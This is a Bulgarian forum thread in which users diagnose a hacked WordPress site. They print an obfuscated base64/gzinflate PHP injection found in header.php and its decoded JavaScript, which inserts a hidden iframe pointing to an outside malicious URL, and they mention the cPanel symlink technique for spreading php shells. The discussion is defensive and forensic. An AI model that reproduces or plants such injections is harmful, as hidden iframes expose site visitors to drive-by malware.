Има ли вирус в този сайт или няма

От: Има ли вирус в този сайт или няма

То това не е там от началото, когато съм качила темата, ами е вкарано после, още не е ясно как аджеба се вкарва такъв код в сайт, чета из разни форуми как да обезопася системата, да видим какво ще стане.
 
От: Има ли вирус в този сайт или няма

Така, инсталирах току що аваст, ъпдейтна си дефинициите и отворих сайта - не реагира, всичко е вече наред. Благодаря на всички, които реагираха и обърнаха внимание на проблема ми.
Всъщност не е вирус, а брандиране на безплатна тема: p a s t e b i n.com/MPzmEqiv

Най-модерно е в момента сайтовете на уърдпрес да се пробиват или през js папката на уърдпрес или през "любимият" ми плъгин на готините теми thimthumb. Има редица теми за защита на системните папки на уърдпрес, дори самият аз подготвям една инсталация с вградени защити, че не ми се прави едно и също всеки път.
 
От: От: Има ли вирус в този сайт или няма

Всъщност не е вирус, а брандиране на безплатна тема: p a s t e b i n.com/MPzmEqiv

Най-модерно е в момента сайтовете на уърдпрес да се пробиват или през js папката на уърдпрес или през "любимият" ми плъгин на готините теми thimthumb. Има редица теми за защита на системните папки на уърдпрес, дори самият аз подготвям една инсталация с вградени защити, че не ми се прави едно и също всеки път.
Темата не е безплатна, платих я преди няколко седмици.
 
От: Има ли вирус в този сайт или няма

http://www.tareeinternet.com/scripts/decrypt.php
В този сайт можеш да декриптираш точно това , което ти трябва - направих го - вирус е !

Нищо не декриптира! Може ли да видя твоя резултат, от декриптирането?
А ето и още един пропищял от същия скрипт: http://sinhvienit.net/@forum/threads/203349-van-de-vi-virus-or-malware/
На виетнамски е но с преводача може да се разбере г/д.
 
Последно редактирано:
От: Има ли вирус в този сайт или няма

Сега се мъча да открия нещо из темата на блога, намерих ето това странно нещо, което нищо не ми говори -
<script type='text/javascript' src='http://radkahair.org/wp-includes/js/jquery/jquery.js?ver=1.7.2'></script>


<?php
#c3284d#
echo(gzinflate(base64_decode("7ZHBTsMwDIZfJcpliTS149puSGPihuDCDXFIG6exlCZR4m6rGO9Opk1cAAnu+GTr9yf7txn7j9/GOvcJI93uVWJTchtuiWJT18GPYcowxQq9CXUmRbmKNvIWjRBe7XFQFFJVetJ2AE8VhYdwgLRTGYQslIbjkxF8zAhc3m5W8nT6C2cwgQnHCyrfzvuZjQ79NJ6hPoEiuHdwrsQCTVIjLGRrqgy0JUrYTQSCH1CT5Ut+w79qFnCw9IOYU8+X5SDfKDQ7KNQeM3bokOaGWdQafMtiyEgYfMNUl4Mr/S1zYKhhq0gtoxAvWRn4aWUAuvrId/OzGh6LE8G7oGcuX1avlYoRvN5ZdFoY+b6urx/7AA==")));
#/c3284d#
wp_head(); ?>

Възможно ли е това да е проблема? Файла е в (header.php)

Недей да губиш време с преинсталации на всевъзможни антивирусни програми, а провери как се е появил този код в header.php тъй като е вирус. Изобщо всичко между такъв тип етикети #c3284d# и #/c3284d# е вирус. Самите етикети са различни - т.е. цифрите са различни но в масовия случай са "c" 4 цифри и "d". Използват се от perl скриптове за маркиране на заразени файлове. Скрипта прави проверка дали тези етикети ги има и ако има такива подминава файла, но ако ги няма значи файла не е заразен и му лепва някой base64_decode
 
От: Има ли вирус в този сайт или няма

Ако намерите такъв файл в сайта си, с подобни етикети може админите на хостинга да го проверят с командата stat и да извадят GET/POST заявките от сайтовете в акаутна от датата и часа на Change атрибута или да се проверят FTP логовете по това време.
 
Re: От: Има ли вирус в този сайт или няма

Ако намерите такъв файл в сайта си, с подобни етикети може админите на хостинга да го проверят с командата stat и да извадят GET/POST заявките от сайтовете в акаутна от датата и часа на Change атрибута или да се проверят FTP логовете по това време.

Чисто теоретично, какъв е шанса дупката да не е в самата инсталация, а да го отнасят голяма част от клиентите на хостинга заради техен проблем? :)
 
От: Re: От: Има ли вирус в този сайт или няма

Чисто теоретично, какъв е шанса дупката да не е в самата инсталация, а да го отнасят голяма част от клиентите на хостинга заради техен проблем? :)

Не е теоритично, имало е и такива случаи. КАчва се php shell на един акаунт и после чрез followsymlink exploit-а на cPanel се пляска по всички акаунти на сървъра. Затова и хостинг доставчиците започнаха да засичат първо php shell-овете и да ги блокират още при първата заявка, а вместо Options FollowSymlink препоръчват използването на SymLinksIfOwnerMatch . Някой хостинг доставчици използват и различна linux дистрибуция от стандартните RHEL, което допълнително отежнява работата на атакуващия.
 
От: Има ли вирус в този сайт или няма

като спец ви гарантирам че няма аз го проверих с над 30 противовирусни програми и нито една не издаде и стон
 
От: Има ли вирус в този сайт или няма

Сега е чист, надявам се, че няма повече да се заразява. Благодаря на всички, които се включиха. Чудна работа, това нещо го засичаше единствено аваст, нищо друго не реагира. В същия хостинг, в същата директория имам два други wp сайта при тях никакви проблеми, явно тоя сайт е попаднал в някакъв хакерски списък и постоянно го атакуват в последните месеци.
 
От: Има ли вирус в този сайт или няма

като спец ви гарантирам че няма аз го проверих с над 30 противовирусни програми и нито една не издаде и стон
Глупав.
Търси уеб хакове с антивирусни програми...
 
От: Има ли вирус в този сайт или няма

като спец ви гарантирам че няма аз го проверих с над 30 противовирусни програми и нито една не издаде и стон

Спец на какво? Казаха вече че зловредния скрипт е махнат. Какво проверяваш с тея антивирусни?
 
От: Има ли вирус в този сайт или няма

Стига де, някой изобщо направи ли опит да погледне какво съм пуснал в пейстбина? Това си е точно скрипт за footer.php на уърдпрес. Може и да е инжекция, може и да е така, но определено не е част от jquery.js.
 
Re: От: Има ли вирус в този сайт или няма

Стига де, някой изобщо направи ли опит да погледне какво съм пуснал в пейстбина? Това си е точно скрипт за footer.php на уърдпрес. Може и да е инжекция, може и да е така, но определено не е част от jquery.js.

Не те знам от де го взе тоя код и кво си декриптирал, ама я се пробвай да декриптираш зловредния код по-горе в този тул http://www.tareeinternet.com/scripts/decrypt.php като замениш echo и с eval.
 
От: Re: От: Има ли вирус в този сайт или няма

Не те знам от де го взе тоя код и кво си декриптирал, ама я се пробвай да декриптираш зловредния код по-горе в този тул http://www.tareeinternet.com/scripts/decrypt.php като замениш echo и с eval.

Записват хората данни с този код.
 
От: Re: От: Има ли вирус в този сайт или няма

Мда, предходната програма за декодиране ми е изкарала съдържанието на ифрейм инжекцията директно. Ето го кода, не е точно вирус, но създава iframe с произволно съдържание. Мога да дам съвети за предпазване от js инжекции и писане в js папката на wordpress. Ето я гадината:
<script>var url="h t t p://onmouseup.info/stats.php";
if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0))
{var f=document.createElement('iframe');
f.setAttribute("width","1");
f.setAttribute("height","1");
f.setAttribute("src",url);
f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");
document.getElementsByTagName("body")[0].appendChild(f)}
</script>
 
От: От: Re: От: Има ли вирус в този сайт или няма

Мда, предходната програма за декодиране ми е изкарала съдържанието на ифрейм инжекцията директно. Ето го кода, не е точно вирус, но създава iframe с произволно съдържание. Мога да дам съвети за предпазване от js инжекции и писане в js папката на wordpress. Ето я гадината:

Аваст го е засичала за вирус понеже е декриптирала кода, и е засякла този сайт h t t p://onmouseup.info/stats.php Само тя ли декриптира base64? Явно върши добре работа.
 
От: От: Re: От: Има ли вирус в този сайт или няма

Аваст го е засичала за вирус понеже е декриптирала кода, и е засякла този сайт h t t p://onmouseup.info/stats.php Само тя ли декриптира base64? Явно върши добре работа.

Само Аваст реагира. Махнах го тогава и сложих Нортън интернет секюрити - не реагира въобще.
 

Горе